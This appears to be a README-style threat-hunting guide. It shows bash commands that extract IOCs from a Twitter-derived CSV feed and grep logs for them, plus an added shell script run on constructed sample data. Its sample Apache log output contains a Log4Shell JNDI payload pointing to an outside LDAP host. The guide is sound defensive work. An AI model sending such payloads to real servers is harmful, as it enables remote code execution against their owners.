Hunt

Hunt IOCs in different environments


  1. Bash commands
  2. Microsoft Defender for Endpoint (MDE)

Bash commands

Some bash commands to get IOCs directly from Tweets.


1. Get raw IOCs by type (url / domain / ip / sha256 / md5)
Command:
curl -s {CSV feed} | awk -F, '$3 == "{type}"' | cut -d, -f4 > {Output File}
Command example - getting suspicious URLs from today:
curl -s https://raw.githubusercontent.com/0xDanielLopez/TweetFeed/master/today.csv | awk -F, '$3 == "url"' | cut -d, -f4 > suspicious_urls.dat
Output example (one URL per line):
url1
url2
url3
url4
...

2. Get raw IOCs by tag (phishing / malware / CobaltStrike / Log4Shell / ...)
Command (write {tag} in lowercase, because the tags column is lowercased before it is matched):
curl -s {CSV feed} | awk -F, 'tolower($5) ~ "{tag}"' | cut -d, -f4 > {Output File}
Command example - getting all IOCs related to CobaltStrike from today:
curl -s https://raw.githubusercontent.com/0xDanielLopez/TweetFeed/master/today.csv | awk -F, 'tolower($5) ~ "cobaltstrike"' | cut -d, -f4 > iocs_CS.dat
Output example (the IOC values themselves, one per line; shown here by their type):
url
md5
ip
ip
ip
url
domain
md5
sha256
...

3. Search IOCs in a file (e.g. log files)
Command (grep -F treats each IOC as a literal string, so the dots in an IP or URL are not regex wildcards):
curl -s {CSV feed} | awk -F, '$3 == "{type}"' | cut -d, -f4 | while read -r line; do grep -F -- "$line" {File}; done
Command example - searching IPs related to the #Log4Shell vulnerability in Apache logs:
curl -s https://raw.githubusercontent.com/0xDanielLopez/TweetFeed/master/today.csv | awk -F, '$3 == "ip" && tolower($5) ~ "log4"' | cut -d, -f4 | while read -r line; do grep -F -- "$line" /var/log/apache2/access.log; done
Output example:
170.210.45.163 - - [16/Dec/2021:21:13:00 +0000] "GET /${jndi:ldap://31.131.16.127:1389/Exploit} HTTP/1.1" 301 589 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
170.210.45.163 - - [16/Dec/2021:21:13:01 +0000] "GET / HTTP/1.1" 301 509 "-" "${jndi:ldap://31.131.16.127:1389/Exploit}"
170.210.45.163 - - [17/Dec/2021:01:48:06 +0000] "GET /${jndi:ldap://31.131.16.127:1389/Exploit} HTTP/1.1" 301 5228 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
170.210.45.163 - - [17/Dec/2021:01:48:07 +0000] "GET / HTTP/1.1" 301 5228 "-" "${jndi:ldap://31.131.16.127:1389/Exploit}"
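Commands 2 and 3 combined into one script, as an added example that is not part of the TweetFeed project: the feed and the Apache log below are constructed inline in the feed's column layout (date,user,type,value,tags,tweet), the function names are hypothetical, and the log is scanned in a single grep pass with fixed-string, whole-word matching so that an IP indicator cannot match a longer IP that merely starts with the same digits.

```shell
#!/bin/sh
# Added example, not part of the TweetFeed project. Same column layout as the feed
# (date,user,type,value,tags,tweet); every value below is constructed, not a real IOC.
SAMPLE_FEED='2021-12-16,user_a,ip,10.0.0.5,#Log4Shell #scanner,https://twitter.com/x/1
2021-12-16,user_b,url,http://bad.example/p,#phishing,https://twitter.com/x/2
2021-12-17,user_c,ip,10.0.0.50,#malware #CobaltStrike,https://twitter.com/x/3
2021-12-17,user_d,domain,bad.example,#log4j,https://twitter.com/x/4'

# Constructed Apache access-log lines. 10.0.0.50 must NOT be reported for the
# indicator 10.0.0.5: plain grep would match it (prefix, and "." is a regex wildcard).
SAMPLE_LOG='10.0.0.5 - - [16/Dec/2021:21:13:00 +0000] "GET / HTTP/1.1" 200 12 "-" "-"
10.0.0.50 - - [16/Dec/2021:21:14:00 +0000] "GET / HTTP/1.1" 200 12 "-" "-"
192.0.2.9 - - [16/Dec/2021:21:15:00 +0000] "GET / HTTP/1.1" 200 12 "-" "-"'

FEED=$(mktemp); printf '%s\n' "$SAMPLE_FEED" > "$FEED"
LOG=$(mktemp);  printf '%s\n' "$SAMPLE_LOG"  > "$LOG"

# extract_iocs FEED_FILE TYPE TAG -> one IOC value per line.
# TYPE "" means any type, TAG "" means any tag; the tag match is case-insensitive
# and literal (index, not ~), so "CobaltStrike" and "cobaltstrike" both work.
# Blank values are dropped: an empty pattern given to grep -f matches every line.
extract_iocs() {
    tr -d '\r' < "$1" | awk -F, -v type="$2" -v tag="$3" '
        (type == "" || $3 == type) &&
        (tag == "" || index(tolower($5), tolower(tag)) > 0) &&
        $4 != "" { print $4 }'
}

# hunt_in_log FEED_FILE TYPE TAG LOG_FILE -> matching log lines.
# One grep pass over the log instead of one grep per IOC; -F treats dots and
# slashes literally and -w requires the IOC to be delimited by non-word characters.
hunt_in_log() {
    pat=$(mktemp) || return 1
    extract_iocs "$1" "$2" "$3" > "$pat"
    if [ -s "$pat" ]; then
        grep -F -w -f "$pat" "$4"
    fi
    rm -f "$pat"
}

# Demo: IPs whose tags contain "log4", hunted in the sample log (prints one line).
hunt_in_log "$FEED" ip log4 "$LOG"
```

Against a real feed, replace the two mktemp files with `curl -s .../today.csv` saved to disk and the path of the log you want to check.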

Microsoft Defender for Endpoint (MDE)

Just examples, modify them as you wish.